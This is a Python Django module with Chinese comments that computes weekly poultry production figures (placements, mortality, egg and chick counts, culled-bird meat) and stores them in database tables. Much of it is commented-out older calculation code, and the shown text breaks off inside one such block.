#此部分为计算各项数据 2019-06-28 [email protected]
'''
###################################################################
'''
获取引种和入舍的时间列表,入参为代次和家禽种类,返回为list
get_Rushe_timeList(1,4) 为获取祖代白羽肉鸭的引种时间列表
flag为1的不参与计算,为0的参与计算
'''
def get_Sum_Rushe_timeList(nGen,nBirdType,save_type):
time_list = []
try:
res = IntroducedInfo.objects.all().values('Year','WeekNum','LivePeriod','RuSheNum','flag').filter(nGeneration=nGen,nBirdsType=nBirdType,nDraftOrOriginal=save_type,flag=0)
for index in res:
time_list.append(index)
except Exception as e:
print('The Error Reason is :',e)
return time_list
def get_Rushe_timeList(nGen,nBirdType,year):
time_list = []
try:
res = IntroducedInfoDetail.objects.all().values('Year','WeekNum','LivePeriod','RuSheNum').filter(nGeneration=nGen,nBirdsType=nBirdType,Year=year)
for index in res:
time_list.append(index)
except Exception as e:
print('The Error Reason is :',e)
return time_list
'''
该接口的功能是给出一个星期(年份、第几周)和生存周期,可以得到生存周期之后的周(年份、第几周),
传入的参数是年份、周度、生存周期,返回值类型list,生存周期内的所有星期的年份和周度
'''
def get_period_week(year,weekNum,livePeriod=1):
# 2006年以前的数据不参与计算,所以从2006年第一周开始参与计算
_year = 2006
time_list = []
try:
index = WeekDateStandard.objects.all().values('id').filter(Year=year,WeekNum=weekNum)[0]['id']
# print('index',index)
except Exception as e:
print('The Error Reason is :',e)
index = 1
limit_start = index - 2
limit_end = limit_start + livePeriod
# print(limit_start,limit_end,'qujian')
try:
res = WeekDateStandard.objects.all().values('Year','WeekNum').order_by('id')[limit_start:limit_end]
# print('res',res)
for item in res:
time_list.append(item)
except Exception as e:
print('The Error Reason is :',e)
time_list = []
return time_list
def get_correct_param_by_week(year,week):
try:
res = WeekCorrectionFactor.objects.all().values().filter(Year=year,WeekNum=week)[0]
except Exception as e:
print(str(e))
return res
'''
将每周计算的结果插入baiyu_weeklyCoreTable中
Time: 2019-06-28
Author:[email protected]
'''
def insert_baiyu_weekly_core(Year,WeekNum,TotalYuChengCunLan):
pass
'''
根据年份和第几周,获取此周的入舍量
入参为:year,week_num,返回值为int
'''
def get_rushe_by_week(year,week_num):
try:
rusheNum = IntroducedInfoDetail.objects.values('RuSheNum').filter(Year=year,WeekNum=week_num)[0]['RuSheNum']
except Exception as e:
rusheNum = 0
print('get_rushe_by_week:The Error Reason is :',e)
return rusheNum
'''
#根据生产周期的第几周,获取死淘率
'''
# def calc_baiyu_weekly_median_core():
# rushe_DateList = get_Rushe_timeList()[0:3]
# for index in rushe_DateList:
# ##step 1:判断上周是否有入舍的鸡苗,如果有查找上周的死淘率
# # print(index['Year'],index['WeekNum'])
# last_week = get_period_week(index['Year'],index['WeekNum'],1)[0]
# print('last_week',last_week)
# last_week_rushe = get_rushe_by_week(last_week['Year'],last_week['WeekNum'])
# current_week_rushe = get_rushe_by_week(index['Year'],index['WeekNum'])
#
# sum_rushe = last_week_rushe + current_week_rushe
# print('Current Rushe is :',sum_rushe)
# ##step 2:查看本周是否有入舍的鸡苗,如果有直接加上上周死淘后的鸡苗数量
'''
#根据第几周获取该生产周的死淘率,入参是第几周,返回值为死淘率
ahthor : [email protected]
date : 2019-07-02
'''
def get_sitaoRate_by_weekCount(week_num):
try:
res = WeekStandardTable.objects.values('siTaoRate').filter(WeekNum=week_num,nGeneration=1)[0]['siTaoRate']
except Exception as e:
res = 0
print('get_sitaoRate_by_weekCount:The Error Reason is:',e,'siTaoLv is invalid !!!')
return res
'''
#根据第几周获取该生产周的周度生产指标,入参是第几周,返回值为死淘率
ahthor : [email protected]
date : 2019-07-04
'''
def get_weekly_param_standard(week_num,bird_type,nGen,SpeciesId=6,feedWayId=1):
param_res = {
'SpeciesId' : 1,
'feedWayId' : 1,
'siTaoRate' : 0,
'ChanDanRate' : 0,
'RuFuZhongDanRate' : 0,
'ShouJingRate' : 0,
'FuHuaRate' : 0,
'JianChuRate' : 0,
'SaleRate' : 0
}
try:
param_res = WeekStandardTable.objects.values().filter(WeekNum=week_num,nGeneration=nGen,nBirdsType=bird_type)[0]
except Exception as e:
print('get_weekly_param_standard:The Error Reason is :',e)
return param_res
'''
根据年份和周度,获取种蛋数量
'''
def get_chandan_num(year,week_num,origin_year,origin_week,bird_type,nGen):
dan_num = 0
try:
dan_num = WeeklyIntroducedMedian.objects.values('TotalDan').filter(Year=year,WeekNum=week_num,originYear=origin_year,originWeek=origin_week,nBirdsType=bird_type,nGeneration=nGen)[0]['TotalDan']
except Exception as e:
print('get_chandan_num:The Error Reason is :',e)
return dan_num
'''
获取淘汰鸡肉的体重和屠宰率,入参是年份,返回值是dict
'''
def get_taotaiji_param(year,bird_type,nGen):
param = {}
try:
param = YearTaotaiJirouParam.objects.all().values().filter(nYear=year,nBirdsType=bird_type,nGeneration=nGen)[0]
except Exception as e:
print('get_taotaiji_param:The Error Reason is:',e)
return param
'''
获取淘汰鸡肉的体重和屠宰率,入参是年份,返回值是dict
'''
def get_taotaiji_param_all(bird_type,nGen):
param = {}
try:
param = YearTaotaiJirouParam.objects.all().values().filter(nBirdsType=bird_type,nGeneration=nGen)
except Exception as e:
print('get_taotaiji_param:The Error Reason is:',e)
return param
# def calc_baiyu_weekly_median_core(bird_type,nGen,CompanyId,SpeciesId,feedWayId,chandan_interval=3):
# # now_time1 = datetime.datetime.now()
# rushe_DateList = get_Rushe_timeList(nGen,bird_type,2006)
# # now_time2 = datetime.datetime.now()
# ## 清空baiyu_weeklyintroducedmedian数据库数据
# cleanup_weeklyintroducedmedian(bird_type,nGen)
#
# # med_core_data_list = []
#
# for index in rushe_DateList:
# #根据年份、周度和生存周期,计算所有在生存周期内的数据
# start_year = index['Year'] #2006
# start_week = index['WeekNum'] #2
# rushe_num = index['RuSheNum'] #15000
#
# for iWeek in range(index['LivePeriod']+3):
# shengchanWeek = iWeek+1
# param = get_weekly_param_standard(iWeek+1,bird_type,nGen,SpeciesId,feedWayId)
# ##根据起始年和周,算接下来生存周期内的每个周度的年和周,如2006年第1周 三周后是 2006年第4周
# cur_year,cur_week = get_week_info_by_offset(start_year,start_week,iWeek)
# start_date,end_date = get_start_end_date_by_week(cur_year,cur_week)
# yuchengCunlan = 0
# chandanCunlan = 0
# chandanNum = 0
# chuji_num = 0
# real_sale_chuji_num = 0
# TaoTaiJiNum = 0
# taotai_jirou = 0
#
# if iWeek == index['LivePeriod']:
# TaoTaiJiNum = rushe_num
# else:
# TaoTaiJiNum = 0
#
# ### 生产周小于25周为育成期,25周之后进入产蛋期
# if iWeek < index['LivePeriod']:
# if shengchanWeek < 25: #25需要改成动态获取
# yuchengCunlan = rushe_num #15000
# chandanCunlan = 0
# else:
# yuchengCunlan = 0
# chandanCunlan = rushe_num
#
# ##根据产蛋期存栏数,计算产蛋的数量
# chandanNum = round(chandanCunlan*param['ChanDanRate']/100*7)
#
# '''
# 获取三个星期之前的产蛋数量,孵化周期是21天,按照3周计算
# '''
# _3week_before_year,_3week_before_weeknum, = get_week_info_by_offset(cur_year,cur_week,chandan_interval*(-1))
# dan_init = get_chandan_num(_3week_before_year, _3week_before_weeknum,start_year,start_week,bird_type,nGen)
# _3week_before_param = get_weekly_param_standard((shengchanWeek-chandan_interval),bird_type,nGen,SpeciesId,feedWayId)
# shoujing_rate = _3week_before_param['ShouJingRate']/100
# rufu_zhongdan_rate = _3week_before_param['RuFuZhongDanRate']/100
# fuhua_rate = _3week_before_param['FuHuaRate']/100
# jianchu_rate = param['JianChuRate']/100
# if nGen == 1:
# chuji_num = round(dan_init*shoujing_rate*rufu_zhongdan_rate*fuhua_rate*jianchu_rate*0.45)
# else:
# chuji_num = round(dan_init * shoujing_rate * rufu_zhongdan_rate * fuhua_rate * jianchu_rate)
# real_sale_chuji_num = chuji_num
#
#
# # print(rushe_num,cur_year,cur_week,shengchanWeek,yuchengCunlan,chandanCunlan,chandanNum,chuji_num,TaoTaiJiNum,taotai_jirou)
# taotaiji_param = get_taotaiji_param(cur_year,bird_type, nGen)
# taotai_jirou = TaoTaiJiNum * taotaiji_param['StandardTZ'] * taotaiji_param['TuZaiRate']*1.0/100
# insertDB_median_baiyu(
# originYear = start_year,
# originWeek = start_week,
# Year = cur_year,
# WeekNum = cur_week,
# startDate = start_date,
# endDate = end_date,
# CompanyId = CompanyId,
# SpeciesId = SpeciesId,
# feedWayId = feedWayId,
# shengchanWeek = shengchanWeek,
# TotalYuChengCunLan = yuchengCunlan,
# TotalChanDanCunLan = chandanCunlan,
# TotalDan = chandanNum,
# TotalChuJi = chuji_num,
# TotalFactSaleChuJi = real_sale_chuji_num,
# TaoTaiJiNum = TaoTaiJiNum,
# dTaoTaiJiRou = taotai_jirou,
# nBirdsType = bird_type,
# nGeneration = nGen,
# )
# rushe_num = round(rushe_num*(100-param['siTaoRate'])/100)
# # WeeklyIntroducedMedian.objects.bulk_create(med_core_data_list)
'''
根据年份和月度,计算该周的育成期存栏量和产蛋期存栏量
'''
def get_data_from_median(year,week_num,bird_type,nGen):
TotalYuChengCunLan = 0
TotalChanDanCunLan = 0
TotalDan = 0
TotalChuJi = 0
TotalFactSaleChuJi = 0
TaoTaiJiNum = 0
dTaoTaiJiRou = 0
try:
res = WeeklyIntroducedMedian.objects.values().filter(Year=year,
WeekNum=week_num,
nBirdsType=bird_type,
nGeneration=nGen)
for index in res:
TotalYuChengCunLan += index['TotalYuChengCunLan']
TotalChanDanCunLan += index['TotalChanDanCunLan']
TotalDan += index['TotalDan']
TotalChuJi += index['TotalChuJi']
TotalFactSaleChuJi += index['TotalFactSaleChuJi']
TaoTaiJiNum += index['TaoTaiJiNum']
dTaoTaiJiRou += index['dTaoTaiJiRou']
except Exception as e:
print('get_data_total_from_median:The Error Reason is :',e)
return TotalYuChengCunLan,TotalChanDanCunLan,TotalDan,TotalChuJi,TotalFactSaleChuJi,TaoTaiJiNum,dTaoTaiJiRou
'''
根据年份和月度,计算该周的育成期存栏量和产蛋期存栏量
'''
def get_data_sum_from_median(year,week_num,bird_type,nGen,save_type):
data_med = {
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0
}
try:
res = WeeklyIntroducedSumMedian.objects.values().filter(Year=year,WeekNum=week_num,nBirdsType=bird_type,nGeneration=nGen,nDraftOrOriginal=save_type)
for index in res:
data_med['TotalYuChengCunLan'] += index['TotalYuChengCunLan']
data_med['TotalChanDanCunLan'] += index['TotalChanDanCunLan']
data_med['TotalDan'] += index['TotalDan']
data_med['TotalChuJi'] += index['TotalChuJi']
data_med['TotalFactSaleChuJi'] += index['TotalFactSaleChuJi']
data_med['TaoTaiJiNum'] += index['TaoTaiJiNum']
data_med['dTaoTaiJiRou'] += index['dTaoTaiJiRou']
except Exception as e:
print('get_data_total_from_median:The Error Reason is :',e)
return data_med
'''
根据年份、第几周和偏移量(当前周后的多少周即为偏移量),获取偏移量周后的年份和第几周
'''
def get_week_info_by_offset(current_year,current_weeknum,offset):
try:
index = WeekDateStandard.objects.all().values('id').filter(Year=current_year, WeekNum=current_weeknum)[0]['id']
except Exception as e:
print('The Error Reason is :', e)
index = 1
try:
res = WeekDateStandard.objects.values('Year','WeekNum').filter(id=index+offset)[0]
dest_year = res['Year']
dest_weeknum = res['WeekNum']
except Exception as e:
print(e)
return dest_year,dest_weeknum
'''
向存储白羽肉鸡中间值的插入数据
'''
def insertDB_median_baiyu(**kwargs):
param_init = {
'originYear':0,
'originWeek':0,
'Year':2050,
'WeekNum':1,
'startDate':'2050-01-01',
'endDate':'2050-01-07',
'CompanyId':14,
'SpeciesId':6,
'feedWayId':1,
'shengchanWeek': 0,
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0,
'nGeneration':1,
'nDraftOrOriginal':1,
'nBirdsType':1,
'Remark':''
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyIntroducedMedian.objects.create(
originYear = param_init['originYear'],
originWeek = param_init['originWeek'],
Year = param_init['Year'],
WeekNum = param_init['WeekNum'],
startDate = param_init['startDate'],
endDate = param_init['endDate'],
CompanyId = param_init['CompanyId'],
SpeciesId = param_init['SpeciesId'],
feedWayId = param_init['feedWayId'],
shengchanWeek = param_init['shengchanWeek'],
TotalYuChengCunLan = param_init['TotalYuChengCunLan'],
TotalChanDanCunLan = param_init['TotalChanDanCunLan'],
TotalDan = param_init['TotalDan'],
TotalChuJi = param_init['TotalChuJi'],
TotalFactSaleChuJi = param_init['TotalFactSaleChuJi'],
TaoTaiJiNum = param_init['TaoTaiJiNum'],
dTaoTaiJiRou = param_init['dTaoTaiJiRou'],
nGeneration = param_init['nGeneration'],
nDraftOrOriginal = param_init['nDraftOrOriginal'],
nBirdsType = param_init['nBirdsType'],
Remark = param_init['Remark']
)
def cleanup_weeklyintroducedmedian(bird_type,nGen):
try:
res = WeeklyIntroducedMedian.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print("insertDB_median_baiyu:The Error Reason is :", e)
return
def cleanup_weeklycoretable(bird_type,nGen,save_type):
try:
res = WeeklyCoreTable.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen,nDraftOrOriginal=save_type).delete()
except Exception as e:
print("insertDB_median_baiyu:The Error Reason is :", e)
return
def insertDB_weekly_core_baiyu(**kwargs):
param_init = {
'Year':2050,
'WeekNum':1,
'startDate':'1000-01-01',
'endDate':'1000-01-01',
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0,
'nGeneration':1,
'nDraftOrOriginal':1,
'nBirdsType':1,
'Remark':''
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
try:
WeeklyCoreTable.objects.create(
Year = param_init['Year'],
WeekNum = param_init['WeekNum'],
startDate = param_init['startDate'],
endDate = param_init['endDate'],
TotalYuChengCunLan = param_init['TotalYuChengCunLan'],
TotalChanDanCunLan = param_init['TotalChanDanCunLan'],
TotalDan = param_init['TotalDan'],
TotalChuJi = param_init['TotalChuJi'],
TotalFactSaleChuJi = param_init['TotalFactSaleChuJi'],
TaoTaiJiNum = param_init['TaoTaiJiNum'],
dTaoTaiJiRou = param_init['dTaoTaiJiRou'],
nGeneration = param_init['nGeneration'],
nDraftOrOriginal = param_init['nDraftOrOriginal'],
nBirdsType = param_init['nBirdsType'],
Remark = param_init['Remark']
)
except Exception as e:
print("The Error Reason is :", e)
'''
根据年份和第几周,获取此周的开始日期和结束日期
'''
def get_start_end_date_by_week(year,week_num):
try:
res = WeekDateStandard.objects.values('startDate','endDate').filter(Year=year,WeekNum=week_num)[0]
start_date = res['startDate']
end_date = res['endDate']
except Exception as e:
start_date = '1000-01-01'
end_date = '1000-01-01'
print('get_start_end_date_by_week:The Error Reason is:',e)
return start_date,end_date
def get_company_info():
res = []
try:
res = CompanyInfo.objects.all().values()
except Exception as e:
print('get_company_info:The Error Reason is:',e)
return res
def get_company_info_by_id(company_id):
res = []
try:
res = CompanyInfo.objects.values().filter(id = company_id)
except Exception as e:
print(e)
return res
def get_feedway_info():
res = []
try:
res = FeedWay.objects.all().values()
except Exception as e:
print("get_feedway_info:The Error Reason is:",e)
return res
def get_species_info():
result = []
try:
result = SpeciesInfo.objects.all().values()
except Exception as e:
print('get_species_info:The Error Reason is:',e)
return result
'''
获取祖代鸡的一日龄雏鸡数量
'''
def get_zudai_chuji_info():
chuji_list = []
zd_res = WeeklyCoreTable.objects.values('Year','WeekNum','TotalFactSaleChuJi')
for index in zd_res:
# print(index['Year'],index['WeekNum'],index['TotalFactSaleChuJi'])
chuji_list.append(index)
return chuji_list
'''
将祖代鸡的一日龄雏鸡的数量,作为父母代鸡的插入父母代引种
'''
def fumudai_introduced_info(*args):
pass
def insertDB_introduced_detail_info(**kwargs):
if not kwargs:
print('no valid kwargs')
return
else:
print('database would be updated')
init_param ={
'Year':0,
'WeekNum':0,
'startDate':'1000-1-1',
'endDate':'1000-1-1',
'CompanyId':0,
'SpeciesId':0,
'feedWayId':0,
'RuSheNum':0,
'LivePeriod':0,
'qzhyFlag':0,
'huanyuRate':0,
'qzhyStartWeek':0,
'HuanyuInterval':0,
'qzhyPeriod':0,
'nGeneration':0,
'nDraftOrOriginal':0,
'nBirdsType':0,
'Remark':0
}
for key in kwargs:
if key in init_param.keys():
init_param[key] = kwargs[key]
else:
print('Keep the origin key and value!')
IntroducedInfoDetail.objects.create(
Year=init_param['Year'],
WeekNum=init_param['WeekNum'],
startDate=init_param['startDate'],
endDate=init_param['endDate'],
CompanyId=init_param['CompanyId'],
SpeciesId=init_param['SpeciesId'],
feedWayId=init_param['feedWayId'],
RuSheNum=init_param['RuSheNum'],
LivePeriod=init_param['LivePeriod'],
qzhyFlag=init_param['qzhyFlag'],
huanyuRate=init_param['huanyuRate'],
qzhyStartWeek=init_param['qzhyStartWeek'],
HuanyuInterval=init_param['HuanyuInterval'],
qzhyPeriod=init_param['qzhyPeriod'],
nGeneration=init_param['nGeneration'],
nDraftOrOriginal=init_param['nDraftOrOriginal'],
nBirdsType=init_param['nBirdsType'],
Remark=init_param['Remark']
)
def insertDB_introduced_sum_info(**kwargs):
if not kwargs:
print('no valid kwargs')
return
else:
print('database would be updated')
init_param ={
'Year':0,
'WeekNum':0,
'startDate':'1000-1-1',
'endDate':'1000-1-1',
'RuSheNum':0,
'LivePeriod':0,
'nGeneration':0,
'nDraftOrOriginal':0,
'nBirdsType':0,
'Remark':0,
'flag':0
}
for key in kwargs:
if key in init_param.keys():
init_param[key] = kwargs[key]
else:
print('Keep the origin key and value!')
IntroducedInfo.objects.create(
Year=init_param['Year'],
WeekNum=init_param['WeekNum'],
startDate=init_param['startDate'],
endDate=init_param['endDate'],
RuSheNum=init_param['RuSheNum'],
LivePeriod=init_param['LivePeriod'],
nGeneration=init_param['nGeneration'],
nDraftOrOriginal=init_param['nDraftOrOriginal'],
nBirdsType=init_param['nBirdsType'],
Remark=init_param['Remark']
)
def clean_introducd_info(bird_type,nGen):
try:
res = IntroducedInfo.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print("clean_introducd_info:The Error Reason is:",str(e))
return
'''
出栏数和肉量统计
'''
def insertDB_weekly_detail_statistics(**kwargs):
param_init = {
'Year': 0,
'WeekNum': 0,
'startDate': '1000-01-01',
'endDate': '1000-01-01',
'CunlLanNum35': 0,
'CunlLanNum42': 0,
'CunlLanNum49': 0,
'CunlLanNum56': 0,
'ChuLanRouJiNum35': 0,
'ChuLanRouJiNum42': 0,
'ChuLanRouJiNum49': 0,
'ChuLanRouJiNum56': 0,
'TotalChuLanRouJiNum': 0,
'HuoZhong35': 0,
'HuoZhong42': 0,
'HuoZhong49': 0,
'HuoZhong56': 0,
'TotalHuoZhong': 0,
'JiRou35': 0,
'JiRou42': 0,
'JiRou49': 0,
'JiRou56': 0,
'TotalJiRou': 0,
'JiXiong35': 0,
'JiXiong42': 0,
'JiXiong49': 0,
'JiXiong56': 0,
'TotalJiXiong': 0,
'JiChi35': 0,
'JiChi42': 0,
'JiChi49': 0,
'JiChi56': 0,
'TotalJiChi': 0,
'JiTui35': 0,
'JiTui42': 0,
'JiTui49': 0,
'JiTui56': 0,
'TotalJiTui': 0,
'JiGuJia35': 0,
'JiGuJia42': 0,
'JiGuJia49': 0,
'JiGuJia56': 0,
'TotalJiGuJia': 0,
'JiNeiZang35': 0,
'JiNeiZang42': 0,
'JiNeiZang49': 0,
'JiNeiZang56': 0,
'TotalJiNeiZang': 0,
'nDraftOrOriginal': 1,
'nBirdsType':1,
'Remark': '',
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyStatisticDetail.objects.create(
Year=param_init['Year'],
WeekNum=param_init['WeekNum'],
startDate=param_init['startDate'],
endDate=param_init['endDate'],
CunlLanNum35=param_init['CunlLanNum35'],
CunlLanNum42=param_init['CunlLanNum42'],
CunlLanNum49=param_init['CunlLanNum49'],
CunlLanNum56=param_init['CunlLanNum56'],
ChuLanRouJiNum35=param_init['ChuLanRouJiNum35'],
ChuLanRouJiNum42=param_init['ChuLanRouJiNum42'],
ChuLanRouJiNum49=param_init['ChuLanRouJiNum49'],
ChuLanRouJiNum56=param_init['ChuLanRouJiNum56'],
TotalChuLanRouJiNum=param_init['TotalChuLanRouJiNum'],
HuoZhong35=param_init['HuoZhong35'],
HuoZhong42=param_init['HuoZhong42'],
HuoZhong49=param_init['HuoZhong49'],
HuoZhong56=param_init['HuoZhong56'],
TotalHuoZhong=param_init['TotalHuoZhong'],
JiRou35=param_init['JiRou35'],
JiRou42=param_init['JiRou42'],
JiRou49=param_init['JiRou49'],
JiRou56=param_init['JiRou56'],
TotalJiRou=param_init['TotalJiRou'],
JiXiong35=param_init['JiXiong35'],
JiXiong42=param_init['JiXiong42'],
JiXiong49=param_init['JiXiong49'],
JiXiong56=param_init['JiXiong56'],
TotalJiXiong=param_init['TotalJiXiong'],
JiChi35=param_init['JiChi35'],
JiChi42=param_init['JiChi42'],
JiChi49=param_init['JiChi49'],
JiChi56=param_init['JiChi56'],
TotalJiChi=param_init['TotalJiChi'],
JiTui35=param_init['JiTui35'],
JiTui42=param_init['JiTui42'],
JiTui49=param_init['JiTui49'],
JiTui56=param_init['JiTui56'],
TotalJiTui=param_init['TotalJiTui'],
JiGuJia35=param_init['JiGuJia35'],
JiGuJia42=param_init['JiGuJia42'],
JiGuJia49=param_init['JiGuJia49'],
JiGuJia56=param_init['JiGuJia56'],
TotalJiGuJia=param_init['TotalJiGuJia'],
JiNeiZang35=param_init['JiNeiZang35'],
JiNeiZang42=param_init['JiNeiZang42'],
JiNeiZang49=param_init['JiNeiZang49'],
JiNeiZang56=param_init['JiNeiZang56'],
TotalJiNeiZang=param_init['TotalJiNeiZang'],
nDraftOrOriginal=param_init['nDraftOrOriginal'],
nBirdsType=param_init['nBirdsType'],
Remark=param_init['Remark']
)
'''
出栏数和肉量统计
'''
def insertDB_weekly_statistics(**kwargs):
param_init = {
'Year': 0,
'WeekNum': 0,
'startDate': '1000-01-01',
'endDate': '1000-01-01',
'CunlLanNum35': 0,
'CunlLanNum42': 0,
'CunlLanNum49': 0,
'CunlLanNum56': 0,
'ChuLanRouJiNum35': 0,
'ChuLanRouJiNum42': 0,
'ChuLanRouJiNum49': 0,
'ChuLanRouJiNum56': 0,
'TotalChuLanRouJiNum': 0,
'HuoZhong35': 0,
'HuoZhong42': 0,
'HuoZhong49': 0,
'HuoZhong56': 0,
'TotalHuoZhong': 0,
'JiRou35': 0,
'JiRou42': 0,
'JiRou49': 0,
'JiRou56': 0,
'TotalJiRou': 0,
'JiXiong35': 0,
'JiXiong42': 0,
'JiXiong49': 0,
'JiXiong56': 0,
'TotalJiXiong': 0,
'JiChi35': 0,
'JiChi42': 0,
'JiChi49': 0,
'JiChi56': 0,
'TotalJiChi': 0,
'JiTui35': 0,
'JiTui42': 0,
'JiTui49': 0,
'JiTui56': 0,
'TotalJiTui': 0,
'JiGuJia35': 0,
'JiGuJia42': 0,
'JiGuJia49': 0,
'JiGuJia56': 0,
'TotalJiGuJia': 0,
'JiNeiZang35': 0,
'JiNeiZang42': 0,
'JiNeiZang49': 0,
'JiNeiZang56': 0,
'TotalJiNeiZang': 0,
'nDraftOrOriginal': 1,
'nBirdsType':1,
'Remark': '',
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyStatisticTable.objects.create(
Year=param_init['Year'],
WeekNum=param_init['WeekNum'],
startDate=param_init['startDate'],
endDate=param_init['endDate'],
CunlLanNum35=param_init['CunlLanNum35'],
CunlLanNum42=param_init['CunlLanNum42'],
CunlLanNum49=param_init['CunlLanNum49'],
CunlLanNum56=param_init['CunlLanNum56'],
ChuLanRouJiNum35=param_init['ChuLanRouJiNum35'],
ChuLanRouJiNum42=param_init['ChuLanRouJiNum42'],
ChuLanRouJiNum49=param_init['ChuLanRouJiNum49'],
ChuLanRouJiNum56=param_init['ChuLanRouJiNum56'],
TotalChuLanRouJiNum=param_init['TotalChuLanRouJiNum'],
HuoZhong35=param_init['HuoZhong35'],
HuoZhong42=param_init['HuoZhong42'],
HuoZhong49=param_init['HuoZhong49'],
HuoZhong56=param_init['HuoZhong56'],
TotalHuoZhong=param_init['TotalHuoZhong'],
JiRou35=param_init['JiRou35'],
JiRou42=param_init['JiRou42'],
JiRou49=param_init['JiRou49'],
JiRou56=param_init['JiRou56'],
TotalJiRou=param_init['TotalJiRou'],
JiXiong35=param_init['JiXiong35'],
JiXiong42=param_init['JiXiong42'],
JiXiong49=param_init['JiXiong49'],
JiXiong56=param_init['JiXiong56'],
TotalJiXiong=param_init['TotalJiXiong'],
JiChi35=param_init['JiChi35'],
JiChi42=param_init['JiChi42'],
JiChi49=param_init['JiChi49'],
JiChi56=param_init['JiChi56'],
TotalJiChi=param_init['TotalJiChi'],
JiTui35=param_init['JiTui35'],
JiTui42=param_init['JiTui42'],
JiTui49=param_init['JiTui49'],
JiTui56=param_init['JiTui56'],
TotalJiTui=param_init['TotalJiTui'],
JiGuJia35=param_init['JiGuJia35'],
JiGuJia42=param_init['JiGuJia42'],
JiGuJia49=param_init['JiGuJia49'],
JiGuJia56=param_init['JiGuJia56'],
TotalJiGuJia=param_init['TotalJiGuJia'],
JiNeiZang35=param_init['JiNeiZang35'],
JiNeiZang42=param_init['JiNeiZang42'],
JiNeiZang49=param_init['JiNeiZang49'],
JiNeiZang56=param_init['JiNeiZang56'],
TotalJiNeiZang=param_init['TotalJiNeiZang'],
nDraftOrOriginal=param_init['nDraftOrOriginal'],
nBirdsType=param_init['nBirdsType'],
Remark=param_init['Remark']
)
def get_xuanyongrate(bird_type,nGen):
result = 0
try:
result = WholeParameter.objects.all().values('XuanYongRate').filter(nBirdsType=bird_type,nGeneration=nGen)[0]['XuanYongRate']
except Exception as e:
print('The error reson is:',str(e))
return result
# def calc_baiyu_weekly_median_core(bird_type,nGen,CompanyId,SpeciesId,feedWayId,chandan_interval=3):
#
# print("%"*20)
# param_all = get_weekly_param_standard_all(bird_type,nGen,SpeciesId,feedWayId)
# taotaiji_param_all = get_taotaiji_param_all(bird_type,nGen)
# xuanyongrate = get_xuanyongrate(bird_type,nGen)
# date_list = get_date_standard_list()
# print("%" * 20)
# rushe_DateList = get_Rushe_timeList(nGen,bird_type,2006)
#
# ## 清空baiyu_weeklyintroducedmedian数据库数据
# cleanup_weeklyintroducedmedian(bird_type,nGen)
#
# med_core_data_list = []
#
# for index in rushe_DateList:
# #根据年份、周度和生存周期,计算所有在生存周期内的数据
# start_year = index['Year'] #2006
# start_week = index['WeekNum'] #2
# rushe_num = index['RuSheNum'] #15000
# dan_tmp_list = []
# for iWeek in range(index['LivePeriod']+chandan_interval):
# cur_year,cur_week,start_date,end_date = get_year_week_by_offset_function(date_list, start_year, start_week, iWeek)
# shengchanWeek = iWeek+1
# ##根据起始年和周,算接下来生存周期内的每个周度的年和周,如2006年第1周 三周后是 2006年第4周
# yuchengCunlan = 0
# chandanCunlan = 0
# chandanNum = 0
# chuji_num = 0
# real_sale_chuji_num = 0
# TaoTaiJiNum = 0
# taotai_jirou = 0
#
# if iWeek == index['LivePeriod']:
# TaoTaiJiNum = rushe_num
# else:
# TaoTaiJiNum = 0
#
# if iWeek < index['LivePeriod']:
# ### 生产周小于25周为育成期,25周之后进入产蛋期
# if shengchanWeek < 25: #25需要改成动态获取
# yuchengCunlan = rushe_num #15000
# chandanCunlan = 0
# else:
# yuchengCunlan = 0
# chandanCunlan = rushe_num
#
# ##根据产蛋期存栏数,计算产蛋的数量
# chandanNum = round(chandanCunlan*param_all[iWeek]['ChanDanRate']/100*7)
# dan_tmp_list.append(chandanNum)
#
# '''
# 获取三个星期之前的产蛋数量,孵化周期是21天,按照3周计算
# '''
# if shengchanWeek < (25+ chandan_interval):
# dan_init = 0
# shoujing_rate = 0
# rufu_zhongdan_rate = 0
# fuhua_rate = 0
#
# else:
# dan_init = dan_tmp_list[iWeek-chandan_interval]
# shoujing_rate = param_all[iWeek-chandan_interval]['ShouJingRate'] / 100
# rufu_zhongdan_rate = param_all[iWeek-chandan_interval]['RuFuZhongDanRate']/100
# fuhua_rate = param_all[iWeek-chandan_interval]['FuHuaRate']/100
# jianchu_rate = param_all[iWeek]['JianChuRate']/100
# chuji_num = round(dan_init*shoujing_rate*rufu_zhongdan_rate*fuhua_rate*jianchu_rate*xuanyongrate/100)
# real_sale_chuji_num = chuji_num
#
#
# taotai_jirou = TaoTaiJiNum * taotaiji_param_all[index['Year']-1990]['StandardTZ'] * taotaiji_param_all[index['Year']-1990]['TuZaiRate']*1.0/100
#
# rushe_num = round(rushe_num*(100-param_all[iWeek]['siTaoRate'])/100)
#
# # print(index['Year'],index['WeekNum'],shengchanWeek,yuchengCunlan, chandanCunlan, chandanNum, chuji_num, real_sale_chuji_num,TaoTaiJiNum,taotai_jirou)
# item = WeeklyIntroducedMedian(
#
# originYear=start_year,
# originWeek=start_week,
# Year=cur_year,
# WeekNum=cur_week,
# startDate=start_date,
# endDate=end_date,
# CompanyId=CompanyId,
# SpeciesId=SpeciesId,
# feedWayId=feedWayId,
# shengchanWeek=shengchanWeek,
# TotalYuChengCunLan=yuchengCunlan,
# TotalChanDanCunLan=chandanCunlan,
# TotalDan=chandanNum,
# TotalChuJi=chuji_num,
# TotalFactSaleChuJi=real_sale_chuji_num,
# TaoTaiJiNum=TaoTaiJiNum,
